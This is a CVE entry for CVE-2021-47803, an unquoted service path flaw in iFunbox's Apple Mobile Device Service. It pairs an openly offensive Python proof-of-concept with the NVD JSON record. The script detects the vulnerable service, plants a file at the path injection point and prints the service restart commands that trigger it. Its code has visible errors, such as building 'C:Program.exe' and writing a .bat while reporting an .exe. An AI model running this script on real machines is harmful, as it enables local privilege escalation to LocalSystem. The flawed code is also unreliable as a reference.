CVE-2021-47803

#!/usr/bin/env python3 # CVE-2021-47803 PoC - iFunbox Unquoted Service Path Privilege Escalation # This PoC demonstrates the unquoted service path vulnerability in iFunbox's Apple Mobile Device Service # Author: Security Researcher # Date: 2024 import os import subprocess import sys import shutil def check_vulnerability(): """Check if target system has the vulnerable service""" try: # Query for the Apple Mobile Device Service result = subprocess.run( ['sc', 'qc', 'Apple Mobile Device Service'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print('[+] Vulnerable service found: Apple Mobile Device Service') # Extract the binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f'[+] Current path: {path}') # Check if path is unquoted and contains spaces if ' ' in path and not path.startswith('"'): print('[+] VULNERABLE: Path is unquoted with spaces!') return True, path return False, None except Exception as e: print(f'[-] Error checking service: {e}') return False, None def create_malicious_executable(output_path): """Create a malicious executable for privilege escalation""" # This is a placeholder - in real attack, this would be actual malicious code malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ // Create a new user with admin privileges // This demonstrates the privilege escalation capability FILE *f = fopen("C:\\\\Windows\\\\Temp\\\\pwned_{os.getpid()}.txt", "w"); if (f) {{ fprintf(f, "Privilege Escalation Successful!\\n"); fprintf(f, "Running as: "); // Execute whoami equivalent system("whoami >> C:\\\\Windows\\\\Temp\\\\pwned_{os.getpid()}.txt"); fclose(f); }} // Spawn a command shell with LocalSystem privileges // In real attack: system("cmd.exe") or similar return 0; }} ''' print(f'[*] Creating malicious executable stub at: {output_path}') # Note: Actual implementation would compile the C code # For demonstration, create a simple batch file with open(output_path.replace('.exe', '.bat'), 'w') as f: f.write(f'@echo off\n') f.write(f'echo [CVE-2021-47803] Privilege Escalation Triggered >> C:\\\\Windows\\\\Temp\\\\pwned.txt\n') f.write(f'whoami >> C:\\\\Windows\\\\Temp\\\\pwned.txt\n') print(f'[+] Malicious file created: {output_path}') return True def exploit(target_path): """Perform the actual exploitation""" # Parse the unquoted path to find injection point # For "C:\Program Files\iFunbox\Apple Mobile Device Service\AMS.exe" # Attack vector: Create "C:\Program.exe" path_parts = target_path.strip('"').split('\\') if len(path_parts) >= 2: # Calculate the injection point (first directory with space in name) injection_dir = path_parts[0] malicious_exe = os.path.join(injection_dir, 'Program.exe') if create_malicious_executable(malicious_exe): print(f'[+] Malicious executable placed at: {malicious_exe}') print('[+] Next step: Trigger service restart to execute payload') print(' Command: sc stop "Apple Mobile Device Service" && sc start "Apple Mobile Device Service"') return True return False if __name__ == '__main__': print('='*60) print('CVE-2021-47803 iFunbox Unquoted Service Path PoC') print('='*60) vulnerable, path = check_vulnerability() if vulnerable: print('\n[*] Attempting exploitation...') exploit(path) else: print('[-] Target not vulnerable or service not found')

{"cve": {"id": "CVE-2021-47803", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:24.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "iFunbox 4.2 contains an unquoted service path vulnerability in the Apple Mobile Device Service that allows local attackers to execute code with elevated privileges. Attackers can insert a malicious executable into the unquoted service path to run with LocalSystem privileges when the service restarts."}, {"lang": "es", "value": "iFunbox 4.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el Servicio de Dispositivos Móviles de Apple que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden insertar un ejecutable malicioso en la ruta de servicio sin comillas para ejecutarse con privilegios de LocalSystem cuando el servicio se reinicia."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50040", "source": "[email protected]"}, {"url": "https://www.i-funbox.com/en/index.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ifunbox-apple-mobile-device-service-unquoted-service-path", "source": "[email protected]"}]}}